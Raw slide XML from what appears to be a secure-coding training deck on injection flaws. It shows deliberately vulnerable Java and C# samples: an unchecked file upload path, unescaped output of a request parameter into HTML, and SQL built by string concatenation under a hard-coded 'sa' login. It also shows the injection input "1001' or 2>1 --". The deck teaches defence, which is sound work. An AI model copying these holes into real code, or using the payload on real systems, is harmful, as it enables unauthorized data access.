              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        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sess.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlQuery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jsonDataGrid.setItems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>query.list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forwardJson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688835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3900" y="1676400"/>
            <a:ext cx="7620000" cy="419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Action.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>onUpload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        if (client != null &amp;&amp; !"".equals(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>clientFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>            String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = "/share/download/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>            String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>pathDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>getRealPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dir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    File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = new File(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>pathDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> + "/" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>clientFileName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UploadFile.copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(client, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dest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        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Action.NONE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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean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442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3900" y="1676400"/>
            <a:ext cx="7620000" cy="419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Action.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>onUpload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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (client != null &amp;&amp; !"".equals(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clientFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>            String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = "/share/download/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>            String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>pathDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>getRealPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dir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    File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = new File(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>pathDir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> + "/" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>clientFileName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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UploadFile.copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Action.NONE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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean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57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2057400"/>
            <a:ext cx="8229600" cy="381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/>
              <a:t>The application uses unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>connection.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>(query , ... );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>( 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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225812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2895600"/>
            <a:ext cx="8229600" cy="1981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/>
              <a:t>(String) page += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>“&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>' type='TEXT‘ value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>("CC") + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>"‘&gt;";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63093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232244"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="449263" y="1598612"/>
          <a:ext cx="8229600" cy="2744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1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6155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369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>End of Part 2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33600" y="2895600"/>
            <a:ext cx="5029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#Enter to next part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>_&gt;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516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Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flaws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60375" y="1631188"/>
            <a:ext cx="7935480" cy="5042745"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 643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16025" y="1564567"/>
            <a:ext cx="6721475" cy="504753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algn="l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string Status = "No";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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string sqlstring ="";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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try {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SqlConnection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sql= new SqlConnection(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@"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data source=localhost;" + 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"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user id=sa;password=password;");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sql.Open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();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sqlstring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="SELECT HasShipped" +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"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FROM Shipment WHERE ID='" + Id + "'";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SqlCommand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cmd = new SqlCommand(sqlstring,sql);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if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((int)cmd.ExecuteScalar() != 0)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Status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= "Yes";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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 catch (SqlException se) {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Status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= sqlstring + " failed\n\r";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foreach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(SqlError e in se.Errors) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+= e.Message + "\n\r";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pt-BR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 catch (Exception e) {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Status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= e.ToString();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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5876926" y="2328157"/>
            <a:ext cx="2160588" cy="465138"/>
            <a:chOff x="3910" y="1271"/>
            <a:chExt cx="1361" cy="293"/>
          </a:xfrm>
        </p:grpSpPr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H="1">
              <a:off x="3910" y="1420"/>
              <a:ext cx="624" cy="144"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFC000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ln w="38100"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endParaRP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4499" y="1271"/>
              <a:ext cx="772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  <a:t>Hard to guess </a:t>
              </a:r>
              <a:b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  <a:t>password!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="630238" y="2931405"/>
            <a:ext cx="1643063" cy="461963"/>
            <a:chOff x="317" y="1627"/>
            <a:chExt cx="1035" cy="291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="946" y="1656"/>
              <a:ext cx="406" cy="88"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFC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Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:endParaRP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317" y="1627"/>
              <a:ext cx="662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  <a:t>Connecting </a:t>
              </a:r>
              <a:b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  <a:t>as sysadmin</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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6397627" y="3245729"/>
            <a:ext cx="1982788" cy="461962"/>
            <a:chOff x="4302" y="1849"/>
            <a:chExt cx="1249" cy="291"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4302" y="1988"/>
              <a:ext cx="384" cy="104"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFC000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Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:endParaRP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4657" y="1849"/>
              <a:ext cx="894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  <a:t>String concat</a:t>
              </a:r>
              <a:b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  <a:t>for dynamic SQL </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4264025" y="5549192"/>
            <a:ext cx="2727325" cy="720725"/>
            <a:chOff x="2614" y="3468"/>
            <a:chExt cx="1718" cy="454"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2614" y="3468"/>
              <a:ext cx="752" cy="160"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFC000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Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:endParaRP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3321" y="3515"/>
              <a:ext cx="1011" cy="407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  <a:t>Telling the </a:t>
              </a:r>
              <a:b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  <a:t>bad guy</a:t>
              </a:r>
              <a:b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  <a:t>too much on failure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5090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72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It's Wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(1 of 3)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123231" y="1659477"/>
            <a:ext cx="6875253" cy="76775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53331" y="2535090"/>
            <a:ext cx="6643688" cy="1943099"/>
            <a:chOff x="1253331" y="2293938"/>
            <a:chExt cx="6643688" cy="1943099"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rounded Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1253331" y="2332038"/>
              <a:ext cx="6643688" cy="1858962"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40005" dist="20320" dir="5400000" algn="ctr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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US" dirty="0"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5" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1603375" y="2293938"/>
              <a:ext cx="5400675" cy="1943099"/>
              <a:chOff x="1642495" y="2332038"/>
              <a:chExt cx="5400675" cy="1943099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1642495" y="2332038"/>
                <a:ext cx="5334000" cy="19430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r>
                  <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Good Guy</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pP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SELECT HasShipped</a:t>
                </a:r>
                <a:b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FROM Shipment </a:t>
                </a:r>
                <a:b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WHERE ID='</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>1001</a:t>
                </a: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'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Picture 1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47270" y="2897217"/>
                <a:ext cx="5295900" cy="305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1253330" y="4521261"/>
            <a:ext cx="6640513" cy="2120691"/>
            <a:chOff x="1253330" y="4280109"/>
            <a:chExt cx="6640513" cy="2120691"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1253330" y="4313238"/>
              <a:ext cx="6640513" cy="2087562"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40000" dist="2032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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US" dirty="0"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0" name="Group 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1603375" y="4280109"/>
              <a:ext cx="5334000" cy="1993900"/>
              <a:chOff x="1908175" y="4327734"/>
              <a:chExt cx="5334000" cy="1993900"/>
            </a:xfrm>
          </p:grpSpPr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1908175" y="4327734"/>
                <a:ext cx="5334000" cy="199390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r>
                  <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Not </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>So </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>Good Guy</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFF00"/>
                  </a:solidFill>
                  <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="l">
                  <a:defRPr/>
                </a:pP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SELECT HasShipped</a:t>
                </a:r>
                <a:b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FROM Shipment </a:t>
                </a:r>
                <a:b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WHERE ID= '</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>1001</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'</a:t>
                </a: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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>or 2&gt;1 -- </a:t>
                </a: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'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="Picture 1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022475" y="5001719"/>
                <a:ext cx="5076825" cy="3026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</p:grpSp>
      </p:grp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1231900" y="1745258"/>
            <a:ext cx="6680200" cy="6464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sqlstring="SELECT HasShipped" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        " 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FROM Shipment WHERE ID='" + Id + "'";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Striped Right Arrow 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8872360">
            <a:off x="6591844" y="1383166"/>
            <a:ext cx="1244511" cy="34170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5" descr="Funny Guy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4379" y="752836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0321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9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It's Wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(2 of 3)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23231" y="1659477"/>
            <a:ext cx="6875253" cy="76775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53331" y="2487465"/>
            <a:ext cx="6643688" cy="1978752"/>
            <a:chOff x="1253331" y="2246313"/>
            <a:chExt cx="6643688" cy="1978752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1253331" y="2332038"/>
              <a:ext cx="6643688" cy="1858962"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40000" dist="2032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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US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603375" y="2246313"/>
              <a:ext cx="5511800" cy="197875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r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Really Bad Guy</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr/>
              </a:pPr>
              <a:endPara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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
